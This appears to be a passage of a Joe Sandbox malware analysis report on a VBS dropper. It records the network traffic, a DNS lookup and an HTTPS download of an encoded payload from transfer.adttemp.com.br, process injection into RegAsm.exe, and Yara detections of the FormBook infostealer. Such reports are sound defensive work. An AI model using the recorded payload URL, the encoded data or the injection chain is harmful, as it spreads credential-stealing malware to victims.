Oct 10, 2024 12:22:56.066797972 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.067589998 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.067655087 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:56.067668915 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.067852974 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.067912102 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:56.067925930 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.068463087 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.068531036 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:56.068546057 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.069154024 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.069214106 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:56.069228888 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.079720020 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.079930067 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:56.079992056 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.080454111 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.080663919 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:56.080725908 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.150254965 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.150480986 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:56.150542974 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.150592089 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.150614023 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.150650024 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.150650978 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:56.150684118 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.150712013 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:56.150729895 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:56.150743008 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.150878906 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.150938988 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.151086092 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:56.151087046 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:56.151155949 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.151197910 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.151262045 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:56.151281118 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.151338100 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:56.151350021 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.151591063 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.151655912 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:56.151694059 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.151750088 CEST	443	49163	104.196.109.209	192.168.2.22
Oct 10, 2024 12:22:56.151804924 CEST	49163	443	192.168.2.22	104.196.109.209
Oct 10, 2024 12:22:56.214586973 CEST	49163	443	192.168.2.22	104.196.109.209

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 10, 2024 12:22:54.797350883 CEST	54562	53	192.168.2.22	8.8.8.8
Oct 10, 2024 12:22:54.815954924 CEST	53	54562	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 10, 2024 12:22:54.797350883 CEST	192.168.2.22	8.8.8.8	0x684c	Standard query (0)	transfer.adttemp.com.br	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 10, 2024 12:22:54.815954924 CEST	8.8.8.8	192.168.2.22	0x684c	No error (0)	transfer.adttemp.com.br		104.196.109.209	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

transfer.adttemp.com.br

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49163	104.196.109.209	443	3316	C:\Users\user\AppData\Local\Temp\temp_executable.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-10 10:22:55 UTC	93	OUT	GET /hUkry/sirdeeeeee.txt HTTP/1.1 Host: transfer.adttemp.com.br Connection: Keep-Alive
2024-10-10 10:22:55 UTC	313	IN	HTTP/1.1 200 OK Date: Thu, 10 Oct 2024 10:22:55 GMT Server: Transfer.sh HTTP Server 1.0 Content-Disposition: attachment; filename="sirdeeeeee.txt" Content-Length: 382988 Content-Type: text/plain; charset=utf-8 X-Made-With: <3 by DutchCoders X-Served-By: Proudly served by DutchCoders Connection: close
2024-10-10 10:22:55 UTC	7687	IN	Data Raw: 4d 4a 56 4a 41 56 77 38 64 63 38 7a 6e 63 4b 76 78 58 46 52 6b 7a 37 33 44 35 46 72 77 52 41 6a 69 35 6e 72 33 66 69 73 2b 39 6d 4f 55 49 54 32 2f 67 66 41 41 6d 68 6b 4d 51 33 67 6c 70 36 66 67 4f 39 4e 44 38 41 6d 50 6e 4b 49 79 4b 6d 46 54 65 36 4f 37 41 4a 45 76 79 74 66 61 34 75 32 48 4f 63 52 6e 72 68 44 68 34 7a 64 37 4b 66 51 2b 30 43 51 4c 61 4a 70 54 39 7a 4f 30 50 38 71 52 4f 51 7a 4d 76 41 70 6f 6f 49 42 43 2f 76 74 63 50 2b 43 2f 35 2f 41 55 45 75 64 6a 76 73 2f 4d 57 78 65 36 4a 6c 44 46 45 43 34 2b 6f 31 6a 4b 62 33 66 41 45 53 49 4f 63 47 78 56 59 75 65 56 6e 4b 5a 52 65 78 56 5a 52 70 58 70 50 34 4c 48 6e 34 74 2f 6b 74 52 41 6b 50 30 77 77 42 70 37 75 67 71 76 55 4e 36 4a 73 37 30 48 78 56 56 4e 75 4f 73 78 34 54 4c 48 34 5a 49 73 4a 42 Data Ascii: MJVJAVw8dc8zncKvxXFRkz73D5FrwRAji5nr3fis+9mOUIT2/gfAAmhkMQ3glp6fgO9ND8AmPnKIyKmFTe6O7AJEvytfa4u2HOcRnrhDh4zd7KfQ+0CQLaJpT9zO0P8qROQzMvApooIBC/vtcP+C/5/AUEudjvs/MWxe6JlDFEC4+o1jKb3fAESIOcGxVYueVnKZRexVZRpXpP4LHn4t/ktRAkP0wwBp7ugqvUN6Js70HxVVNuOsx4TLH4ZIsJB
2024-10-10 10:22:55 UTC	505	IN	Data Raw: 39 65 74 4d 70 32 4a 39 49 44 4f 41 68 59 42 39 59 55 31 49 56 35 53 42 6e 78 58 78 4b 57 4b 69 67 65 78 7a 64 39 2f 6c 39 37 63 4f 6e 70 73 32 77 58 32 71 46 4c 58 46 61 33 58 2b 61 41 58 53 77 32 52 39 6c 66 71 47 54 66 47 6f 63 41 61 55 38 70 38 6a 79 74 78 67 71 6b 35 51 47 74 41 61 70 37 6f 42 64 63 79 48 4e 51 43 54 70 53 37 79 2b 39 79 39 48 66 4b 65 37 36 77 6e 35 65 49 73 39 56 77 37 6d 54 75 64 78 78 56 51 61 6e 6a 37 54 55 6b 33 4e 42 4a 76 34 46 6c 4e 33 54 6e 65 4e 4e 46 71 79 4c 45 36 58 70 4b 69 54 62 36 38 74 56 4e 63 6c 52 34 46 45 52 43 37 6c 4f 6a 77 75 2b 68 4e 55 31 78 5a 41 72 6c 7a 48 34 67 64 78 4c 46 43 46 63 56 59 34 57 43 64 67 45 47 78 76 4b 6d 65 39 30 68 4d 75 50 48 5a 55 44 73 74 79 4e 32 77 63 7a 46 4c 6c 66 57 59 4d 65 69 Data Ascii: 9etMp2J9IDOAhYB9YU1IV5SBnxXxKWKigexzd9/l97cOnps2wX2qFLXFa3X+aAXSw2R9lfqGTfGocAaU8p8jytxgqk5QGtAap7oBdcyHNQCTpS7y+9y9HfKe76wn5eIs9Vw7mTudxxVQanj7TUk3NBJv4FlN3TneNNFqyLE6XpKiTb68tVNclR4FERC7lOjwu+hNU1xZArlzH4gdxLFCFcVY4WCdgEGxvKme90hMuPHZUDstyN2wczFLlfWYMei
2024-10-10 10:22:55 UTC	7495	IN	Data Raw: 4e 2f 4e 79 4c 44 41 36 34 69 62 41 39 62 32 70 4c 76 6f 59 76 43 34 35 55 45 55 31 6f 7a 44 39 36 2f 66 53 32 35 7a 74 62 7a 48 34 4b 6e 52 47 2b 51 56 67 56 54 78 52 45 75 4b 64 47 4e 76 6b 32 59 55 54 2b 4e 57 52 63 49 32 79 6f 68 57 71 51 78 77 56 52 6b 41 61 50 36 2b 68 4e 42 57 65 33 4f 43 65 71 62 62 5a 49 54 50 33 77 6a 77 43 54 72 54 64 52 79 49 76 61 66 61 35 33 70 76 55 37 34 43 71 44 79 30 53 76 77 56 79 77 77 2b 74 33 4d 74 7a 62 4e 43 30 54 2f 6e 45 56 5a 57 32 4c 77 46 7a 33 42 6c 70 66 4d 64 49 6e 56 4d 79 37 53 42 41 38 51 6e 48 59 6f 37 41 39 4c 4b 38 38 6a 6f 75 30 70 32 45 2f 63 4b 45 78 48 50 38 46 67 74 4c 71 6b 58 52 4e 50 63 49 52 4a 45 72 61 54 4e 52 44 6c 79 65 51 68 43 71 6c 56 73 32 6a 43 6d 34 48 6a 77 49 2f 45 38 7a 77 30 30 Data Ascii: N/NyLDA64ibA9b2pLvoYvC45UEU1ozD96/fS25ztbzH4KnRG+QVgVTxREuKdGNvk2YUT+NWRcI2yohWqQxwVRkAaP6+hNBWe3OCeqbbZITP3wjwCTrTdRyIvafa53pvU74CqDy0SvwVyww+t3MtzbNC0T/nEVZW2LwFz3BlpfMdInVMy7SBA8QnHYo7A9LK88jou0p2E/cKExHP8FgtLqkXRNPcIRJEraTNRDlyeQhCqlVs2jCm4HjwI/E8zw00
2024-10-10 10:22:55 UTC	697	IN	Data Raw: 58 45 36 56 67 63 79 54 57 63 61 63 32 32 59 4b 38 4e 4f 35 35 4d 6b 45 48 4f 2f 45 49 68 61 5a 70 2f 47 74 6a 39 4d 45 6b 35 38 66 70 56 2b 37 52 6e 51 46 49 57 71 35 2f 51 4e 2f 2b 6e 6a 55 36 6a 44 49 68 71 6f 4b 33 58 41 46 72 4a 35 64 67 78 62 69 75 62 72 6a 61 42 4b 79 58 66 4d 62 51 57 65 4b 70 49 7a 39 74 52 37 4d 4e 34 34 65 42 43 79 79 43 36 41 69 33 39 63 42 46 4b 72 69 41 35 63 32 52 4d 54 67 4a 4f 67 65 44 4a 70 39 34 36 46 55 44 42 46 4d 46 65 41 67 32 77 66 69 78 30 44 5a 4a 65 56 63 71 31 61 36 5a 65 65 74 55 38 6d 49 34 6b 49 77 68 37 72 31 69 32 2b 55 2f 56 4c 6e 54 34 79 71 55 57 4d 32 45 6c 50 45 50 6f 48 38 66 62 6f 32 6c 52 64 4e 50 45 6b 71 38 61 4b 75 33 31 4d 50 48 70 56 74 69 7a 50 71 46 2b 39 46 39 6b 4a 2b 31 74 7a 69 35 57 4c Data Ascii: XE6VgcyTWcac22YK8NO55MkEHO/EIhaZp/Gtj9MEk58fpV+7RnQFIWq5/QN/+njU6jDIhqoK3XAFrJ5dgxbiubrjaBKyXfMbQWeKpIz9tR7MN44eBCyyC6Ai39cBFKriA5c2RMTgJOgeDJp946FUDBFMFeAg2wfix0DZJeVcq1a6ZeetU8mI4kIwh7r1i2+U/VLnT4yqUWM2ElPEPoH8fbo2lRdNPEkq8aKu31MPHpVtizPqF+9F9kJ+1tzi5WL
2024-10-10 10:22:55 UTC	7303	IN	Data Raw: 50 57 33 6b 6e 55 75 77 76 78 6d 77 62 4a 50 4f 53 49 77 42 42 55 4c 4e 74 63 4f 6a 44 57 33 42 54 6f 6e 4e 70 63 6e 57 70 37 37 45 34 51 71 62 58 77 65 76 43 62 52 30 7a 64 61 56 34 4f 75 63 67 41 61 79 45 39 62 58 6f 48 70 57 62 57 48 4b 73 34 32 48 6c 32 6d 6b 49 59 33 61 55 38 4d 73 30 46 51 4a 67 33 69 51 4b 35 57 4b 38 39 4a 79 63 59 62 69 46 57 56 46 37 4c 78 54 45 62 68 70 62 4c 4e 6a 73 32 77 56 39 7a 64 2b 63 55 35 37 67 71 37 36 62 49 6b 63 39 49 73 4a 74 54 71 71 38 35 68 74 53 33 63 6e 32 5a 70 70 33 6f 6c 34 47 76 41 6f 62 58 73 75 70 47 75 37 4b 57 62 64 56 64 34 52 36 58 62 42 79 79 6e 50 7a 4b 64 64 7a 54 39 71 37 38 34 68 41 4f 46 51 79 67 2b 69 61 56 59 31 42 69 34 45 5a 62 75 59 49 53 33 4b 61 48 58 52 6f 50 4e 44 2b 57 50 35 48 6f 44 Data Ascii: PW3knUuwvxmwbJPOSIwBBULNtcOjDW3BTonNpcnWp77E4QqbXwevCbR0zdaV4OucgAayE9bXoHpWbWHKs42Hl2mkIY3aU8Ms0FQJg3iQK5WK89JycYbiFWVF7LxTEbhpbLNjs2wV9zd+cU57gq76bIkc9IsJtTqq85htS3cn2Zpp3ol4GvAobXsupGu7KWbdVd4R6XbByynPzKddzT9q784hAOFQyg+iaVY1Bi4EZbuYIS3KaHXRoPND+WP5HoD
2024-10-10 10:22:55 UTC	889	IN	Data Raw: 6b 4d 6c 69 64 75 69 34 41 52 43 4e 41 6d 6e 2f 44 6e 54 46 58 6b 47 46 79 4d 68 66 6f 78 7a 6d 45 66 6a 6e 78 33 55 4a 36 41 34 4e 76 39 35 37 4a 45 50 64 31 6e 62 73 6f 68 4e 38 6c 77 6f 77 4c 6c 5a 71 70 63 68 41 34 38 55 59 39 6f 4c 35 75 6d 74 69 39 52 6d 6a 33 39 37 50 48 34 31 35 47 70 69 35 38 4e 32 4f 6a 4e 6d 58 39 53 5a 67 4e 6c 33 43 6d 2f 38 45 47 77 4e 4f 73 4a 42 55 74 52 67 57 46 65 67 43 4a 76 79 4c 6d 31 48 62 61 69 56 46 36 70 52 30 34 4a 45 6c 34 39 53 68 57 58 4a 54 7a 6b 75 79 58 36 38 61 44 36 37 64 34 30 46 78 67 4e 74 33 4d 54 61 51 35 79 7a 50 69 66 76 6b 47 66 41 6c 79 4a 59 50 75 2f 71 49 56 41 6f 78 6d 39 6e 69 63 45 6f 42 4c 56 4b 42 6c 72 4e 62 79 4d 65 76 43 47 30 63 59 46 6f 43 46 4f 56 2f 47 46 52 31 35 62 4b 79 62 72 55 Data Ascii: kMlidui4ARCNAmn/DnTFXkGFyMhfoxzmEfjnx3UJ6A4Nv957JEPd1nbsohN8lwowLlZqpchA48UY9oL5umti9Rmj397PH415Gpi58N2OjNmX9SZgNl3Cm/8EGwNOsJBUtRgWFegCJvyLm1HbaiVF6pR04JEl49ShWXJTzkuyX68aD67d40FxgNt3MTaQ5yzPifvkGfAlyJYPu/qIVAoxm9nicEoBLVKBlrNbyMevCG0cYFoCFOV/GFR15bKybrU
2024-10-10 10:22:55 UTC	7111	IN	Data Raw: 4c 6e 41 63 76 53 7a 68 56 43 30 72 47 79 67 5a 65 44 38 42 70 4c 48 73 6a 59 2f 53 75 51 2b 6e 55 6f 47 36 63 2b 63 31 79 31 6c 51 64 38 67 4e 69 66 41 73 78 72 75 34 6f 43 4d 69 30 7a 76 34 69 32 33 6e 36 4f 7a 63 44 62 79 4b 35 58 4f 34 39 6f 79 47 6b 47 34 58 44 34 78 42 50 36 44 7a 67 61 67 41 6d 50 79 31 78 54 39 47 45 4f 73 68 38 54 78 51 59 74 5a 59 74 79 51 4b 4b 48 2b 39 44 53 56 34 5a 4e 30 6b 69 53 61 79 43 6c 77 4e 56 56 65 68 2f 73 35 33 72 73 67 55 53 36 75 34 43 75 37 57 74 77 42 75 75 42 78 64 76 42 57 54 4a 42 72 47 6e 49 38 62 33 79 68 36 6b 52 43 35 48 7a 44 44 2b 6e 74 39 43 78 47 51 70 4e 6d 55 71 69 68 54 53 41 44 57 4e 68 31 76 30 33 61 49 2b 30 35 58 42 49 55 56 34 35 5a 61 55 70 4d 53 59 6d 69 4c 66 33 61 69 2b 6f 6a 6d 63 70 52 Data Ascii: LnAcvSzhVC0rGygZeD8BpLHsjY/SuQ+nUoG6c+c1y1lQd8gNifAsxru4oCMi0zv4i23n6OzcDbyK5XO49oyGkG4XD4xBP6DzgagAmPy1xT9GEOsh8TxQYtZYtyQKKH+9DSV4ZN0kiSayClwNVVeh/s53rsgUS6u4Cu7WtwBuuBxdvBWTJBrGnI8b3yh6kRC5HzDD+nt9CxGQpNmUqihTSADWNh1v03aI+05XBIUV45ZaUpMSYmiLf3ai+ojmcpR
2024-10-10 10:22:55 UTC	1081	IN	Data Raw: 56 6e 39 74 61 43 77 42 7a 69 36 55 33 71 70 48 38 4c 4e 54 4f 6d 47 31 2b 63 4b 67 66 4c 78 77 6d 63 78 49 68 37 58 4b 6a 2b 5a 30 58 6f 4b 68 47 56 36 49 68 4f 63 5a 52 39 72 44 68 48 75 5a 5a 7a 53 64 36 62 79 2f 61 77 55 4a 75 2f 4a 30 33 75 53 73 4b 69 4d 31 7a 61 35 62 63 47 46 62 59 6b 35 7a 7a 68 46 47 36 72 48 48 32 55 53 6a 6f 45 2b 6d 76 41 32 47 54 56 4c 76 65 50 6b 65 4a 61 58 75 33 43 30 32 30 7a 6c 6b 31 70 59 79 77 76 57 73 35 6c 62 47 51 33 54 65 38 61 47 6d 42 39 39 6a 4f 76 43 7a 49 70 49 66 55 35 6f 38 4a 6b 68 74 72 68 38 70 61 55 4d 61 58 77 49 74 67 51 30 4d 41 6e 53 56 2b 6e 2f 6e 4d 47 67 72 61 51 71 36 51 58 6f 42 47 33 64 50 53 32 6d 45 71 77 7a 69 6d 41 78 59 74 44 4c 32 38 47 54 42 35 5a 4c 6a 75 62 6a 75 6e 53 55 77 43 64 65 Data Ascii: Vn9taCwBzi6U3qpH8LNTOmG1+cKgfLxwmcxIh7XKj+Z0XoKhGV6IhOcZR9rDhHuZZzSd6by/awUJu/J03uSsKiM1za5bcGFbYk5zzhFG6rHH2USjoE+mvA2GTVLvePkeJaXu3C020zlk1pYywvWs5lbGQ3Te8aGmB99jOvCzIpIfU5o8Jkhtrh8paUMaXwItgQ0MAnSV+n/nMGgraQq6QXoBG3dPS2mEqwzimAxYtDL28GTB5ZLjubjunSUwCde
2024-10-10 10:22:55 UTC	6919	IN	Data Raw: 58 58 52 35 37 37 38 32 58 66 37 2f 32 2f 6d 49 4a 48 68 50 32 68 2b 54 44 74 74 70 46 4b 2f 6c 2b 77 32 41 45 76 33 4c 79 4b 63 53 76 70 36 59 34 39 72 4f 53 36 58 62 4e 69 33 36 38 2f 6e 4f 63 54 31 78 53 4e 41 6a 70 67 46 77 69 6a 6b 4c 4d 34 41 51 52 6a 56 57 63 48 5a 69 35 54 77 56 36 56 34 68 33 62 35 6a 4a 59 6e 49 37 6e 39 4b 55 6a 76 36 71 66 5a 6d 4a 51 2b 33 69 68 67 77 41 58 66 79 35 6f 6a 49 76 45 2f 57 68 6a 66 7a 6c 4d 75 4c 35 62 62 44 4d 30 65 6f 72 4a 48 36 72 39 73 73 37 38 38 4b 76 37 73 46 66 6d 56 35 78 70 4d 33 53 4e 72 38 47 31 43 68 36 38 32 58 42 34 47 76 73 54 52 6d 68 44 39 73 2f 66 76 4b 6d 4f 2b 79 65 57 4f 67 6d 71 30 43 58 48 54 69 34 48 70 7a 6b 6c 63 39 62 7a 37 2b 62 6b 70 73 45 51 54 57 31 6d 68 47 4d 4c 4c 75 6b 42 30 Data Ascii: XXR57782Xf7/2/mIJHhP2h+TDttpFK/l+w2AEv3LyKcSvp6Y49rOS6XbNi368/nOcT1xSNAjpgFwijkLM4AQRjVWcHZi5TwV6V4h3b5jJYnI7n9KUjv6qfZmJQ+3ihgwAXfy5ojIvE/WhjfzlMuL5bbDM0eorJH6r9ss788Kv7sFfmV5xpM3SNr8G1Ch682XB4GvsTRmhD9s/fvKmO+yeWOgmq0CXHTi4Hpzklc9bz7+bkpsEQTW1mhGMLLukB0
2024-10-10 10:22:55 UTC	1273	IN	Data Raw: 4b 31 57 4a 7a 74 44 79 39 50 45 43 59 33 54 30 4a 36 73 7a 77 79 6f 71 66 2b 2b 76 6d 51 35 79 41 6e 59 6c 6c 33 6e 30 32 6b 67 48 64 6e 76 74 67 73 2f 33 4e 59 43 66 48 49 49 36 6d 35 76 61 4c 42 71 2f 6b 43 65 2b 6d 4e 73 46 45 32 59 66 63 68 67 55 4a 52 42 62 6f 74 4b 75 72 77 58 6a 57 38 76 35 4f 71 32 6b 51 65 32 76 67 76 55 71 30 47 2b 31 71 77 38 58 56 32 47 6d 4a 36 6b 73 72 6c 42 54 76 4c 77 45 66 76 72 39 30 56 50 34 38 76 74 4b 37 62 6e 4e 69 39 44 47 38 2b 6f 45 47 79 41 78 6d 59 46 57 4a 31 34 4d 62 73 69 45 58 76 36 61 43 68 53 76 36 4d 6b 57 2b 6b 68 78 5a 4b 50 4e 39 36 34 4b 47 6e 47 38 6f 4d 66 34 73 69 43 52 75 64 4e 4c 73 34 72 4e 4e 33 6f 6e 33 73 6d 48 41 54 4a 6f 57 57 49 79 42 49 51 64 78 61 50 6b 36 54 6d 75 56 67 6b 4c 74 56 65 Data Ascii: K1WJztDy9PECY3T0J6szwyoqf++vmQ5yAnYll3n02kgHdnvtgs/3NYCfHII6m5vaLBq/kCe+mNsFE2YfchgUJRBbotKurwXjW8v5Oq2kQe2vgvUq0G+1qw8XV2GmJ6ksrlBTvLwEfvr90VP48vtK7bnNi9DG8+oEGyAxmYFWJ14MbsiEXv6aChSv6MkW+khxZKPN964KGnG8oMf4siCRudNLs4rNN3on3smHATJoWWIyBIQdxaPk6TmuVgkLtVe

Target ID:	0
Start time:	06:22:51
Start date:	10/10/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\KjFT0qPTo4.vbs"
Imagebase:	0xff960000
File size:	168'960 bytes
MD5 hash:	045451FA238A75305CC26AC982472367
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	06:22:53
Start date:	10/10/2024
Path:	C:\Users\user\AppData\Local\Temp\temp_executable.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\temp_executable.exe"
Imagebase:	0x12f0000
File size:	72'704 bytes
MD5 hash:	12E3B467C52A663A7B6F61AF61B63A11
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	06:22:55
Start date:	10/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xeb0000
File size:	64'704 bytes
MD5 hash:	8FE9545E9F72E460723F484C304314AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.455484382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.455484382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.455450302.0000000000270000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.455450302.0000000000270000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	19.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	24.6%
Total number of Nodes:	57
Total number of Limit Nodes:	1

Executed Functions

Function 002C9970 Relevance: 1.9, Strings: 1, Instructions: 605
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(, xrefs: 002CA13D

Memory Dump Source

Source File: 00000002.00000002.369860906.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c0000_temp_executable.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: (
API String ID: 3559483778-3887548279
Opcode ID: b58632924d49a6476f309fd792e2797273a81b90be7caab8de7b3c17c3ce8b1e
Instruction ID: 404894af775fe1d70f563735a1c09e9cfb1f3e0bc3311c6e616b876116175854
Opcode Fuzzy Hash: b58632924d49a6476f309fd792e2797273a81b90be7caab8de7b3c17c3ce8b1e
Instruction Fuzzy Hash: 5B52CD75E112288FDB64DF69C885BDDBBB2AF89300F1482EAD409A7255DB309EC5CF41

Function 002C8148 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.369860906.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c0000_temp_executable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 368cbcb76a6eaf91f3d9d80bc6d1767fda688cb7f58c24396d4dfd9eb227fab4
Instruction ID: 6df6fccbf7f55ff0715354450270712a28c99d9adb971210417ba5ed4539dbd5
Opcode Fuzzy Hash: 368cbcb76a6eaf91f3d9d80bc6d1767fda688cb7f58c24396d4dfd9eb227fab4
Instruction Fuzzy Hash: D7D1B174E11209CFCB14CFA9C884AEDBBF1BF89314F149669D409AB365DB70A986CF50

Function 002CA464 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 267
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,00000005,?,?,?,?,?,?,?), ref: 002CA6F9

Strings

|', xrefs: 002CA7D4

Memory Dump Source

Source File: 00000002.00000002.369860906.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c0000_temp_executable.jbxd

Similarity

API ID: CreateProcess
String ID: |'
API String ID: 963392458-3784055907
Opcode ID: a67b75670c3c72997f611a0b9247058a95f620511d45ec6bb972796345bf3933
Instruction ID: 271f59ab8c9eaef5f999ec030ab55a77cf7b0d1c08273f1c5faa78bfa465169d
Opcode Fuzzy Hash: a67b75670c3c72997f611a0b9247058a95f620511d45ec6bb972796345bf3933
Instruction Fuzzy Hash: 90A17E71D102599FDB10CFA8C881BEDBBF2FF48304F14826AE819A7291D7749995CF92

Function 002C962C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 264
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,00000005,?,?,?,?,?,?,?), ref: 002CA6F9

Strings

|', xrefs: 002CA7D4

Memory Dump Source

Source File: 00000002.00000002.369860906.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c0000_temp_executable.jbxd

Similarity

API ID: CreateProcess
String ID: |'
API String ID: 963392458-3784055907
Opcode ID: 07b87071c297ac2803fbd6654dbc159b1dbb494c2cad0ecf28eabe989b3e0e3e
Instruction ID: 24ff2c23f1d0d3e6eb0c5a44ad44b63ef355500107427f2e2758b783b94a4e25
Opcode Fuzzy Hash: 07b87071c297ac2803fbd6654dbc159b1dbb494c2cad0ecf28eabe989b3e0e3e
Instruction Fuzzy Hash: 4FA15B71D102199FDB10CFA8C841BEDBBB2BF48308F14826AE819A7291D7749995CF92

Function 002C9674 Relevance: 1.6, APIs: 1, Instructions: 70
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,00000000,00000000,?,00010002), ref: 002CAF95

Memory Dump Source

Source File: 00000002.00000002.369860906.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c0000_temp_executable.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 922c7f4fed9128132e15105c41cb803766660b71985d1ca5026b282a624e467a
Instruction ID: eaf35a2ab38a938789af5c51bea021346f29ebcc8af5fbf906d9e1c40b7f2aa2
Opcode Fuzzy Hash: 922c7f4fed9128132e15105c41cb803766660b71985d1ca5026b282a624e467a
Instruction Fuzzy Hash: 3A2113B19103099FCF10CF9AC885BEEBBF5FB48314F10852EE818A7640D378A954CBA1

